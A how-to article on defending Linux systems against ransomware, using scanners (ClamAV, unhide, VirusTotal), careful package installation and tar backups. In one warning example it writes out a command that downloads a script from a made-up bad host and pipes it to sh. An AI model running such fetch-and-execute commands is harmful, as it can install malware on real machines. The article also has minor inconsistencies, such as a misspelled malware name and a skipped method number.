Ransomware is one of the more threatening problems in the world of network security today. It’s frightening to think that someone could hold your data hostage. Some ransomware infections encrypt all data on a particular volume, and the individuals behind it demand a certain amount of money before they will agree to release the key needed to unlock said data. It’s especially concerning for people who have a great deal of money invested in their data. There’s a small bit of good news for Linux users, however.
Under most situations, its difficult for ransomware code to gain control of anything more than just a user’s home directory. These programs don’t have the permissions to trash an entire install. This is why Linux ransomware is more of a problem on servers where operators always have root access. Ransomware shouldn’t be much of an issue for Linux users, and there are several steps to take to prevent it from happening to you.
Method 1: Defending Against BashCrypt-style Attacks
BasyCrypt is a proof of concept piece of ransomware that proved it’s possible to infect server structures with this type of malicious code. This provides a baseline for what Linux ransomware packages might look like. While they’re currently uncommon, the same sorts of common sense preventative measures for server administrators of other platforms work just as well here. The problem is that in enterprise-level environments there might be a large number of different people using a host system.
If you’re running a mail server, it can be awfully hard to keep people from doing foolish things. Do your best to remind everyone not to open attachments they aren’t sure about, and always malware scan everything in question. One other thing that can really help to prevent these sorts of attacks comes from watching how you install binaries with wget. Naturally your mail server probably lacks a desktop environment altogether and you probably use wget, apt-get, yum or pacman to manage packages coming over. It’s very important to watch what repositories are used in these installations. Sometimes you’ll either see a command that wants you to execute something like wget http://www.thisisaprettybadcoderepo.webs/ -O- | sh, or it might be inside of a shell script. In either way, don’t run it if you don’t know what that repository is for.
Method 2: Installing a Scanner Package
Several pieces of open source malware scanning technology exist. ClamAV is by far the most famous, and you can install it on many apt-based distributions by using:
sudo apt-get install clamav
When it’s installed, man clamav should explain the usage in plain language. Keep in mind that while it can scan and remove infected files, it can’t actually remove infectious code from a file. This is an all or nothing situation.
There’s a second scanner you might not be familiar with, but it’s useful if hidden processes are what scare you. Again if you’re using an apt-based distribution, then issue this command to install the unhide scanner:
sudo apt-get install unhide
When it’s installed, type:
sudo unhide sys
This will do a full scan of your system for any hidden processes.
Method 4: Keeping Clean Backups on Hand
While this shouldn’t even be an issue since everyone should always make backups, having good backups can instantly zap ransomware out. What very little ransomware there is on the Linux platform tends to attack files with extensions that are specific to Web development platforms. This means if you have a ton of .php, .xml or .js code sitting around, you’ll specifically want to back this up. Consider this following line of code:
tar -cf backups.tar $(find -name “*.ruby” -or -name “*.html”)
This should create a big tape archive file of every file with the .ruby and .html extensions within a file structure. It can then be moved to a different temporary subdirectory for extraction to ensure that creating it worked properly.
This tape archive can and should be moved to an external volume. You can of course use .bz2, .gz or .xv compression before doing so. You may wish to create mirrored backups by copying it over to two different volumes.
Method 5: Using Web-based Scanners
Perhaps you’ve downloaded an RPM or DEB package from a site that promises to contain useful software. Software is also distributed via 7z or compressed tar files as well. Mobile users might also receive Android packages in APK format. It’s easy to scan these with a tool right in your browser. Point it to https://www.virustotal.com/gui/, and once the page loads hit the “Choose File” button. Before you upload, keep in mind that this is a public server. While it’s safe and run by Alphabet Inc, it does transfer files publicly, which might be an issue in some super-secure environments. It’s also limited to 128 MB files.
Select your file in the box that comes up and select open. The file name will appear in the line next to the button after the box vanishes.
Click on the large blue “Scan it!” button. You will see another box that indicates that the system is uploading your file.
If someone already checked out the file beforehand, then it will notify you of the previous report. It recognizes this based on an SHA256 sum, which works the same way as the same Linux command line tools that you’re used to. If not, then it will run a full scan with 53 different scanning programs. A few of them might time out when the file is run, and these results can be safely ignored.
Some programs might return different results than others, so it’s easy to weed out false positives with this system. The best part is that it works between different platforms, which makes it equally attractive regardless of which distribution you have on different devices. It also works just as well from mobile distributions like Android, which again is why it’s a great way to inspect APK packages before using them.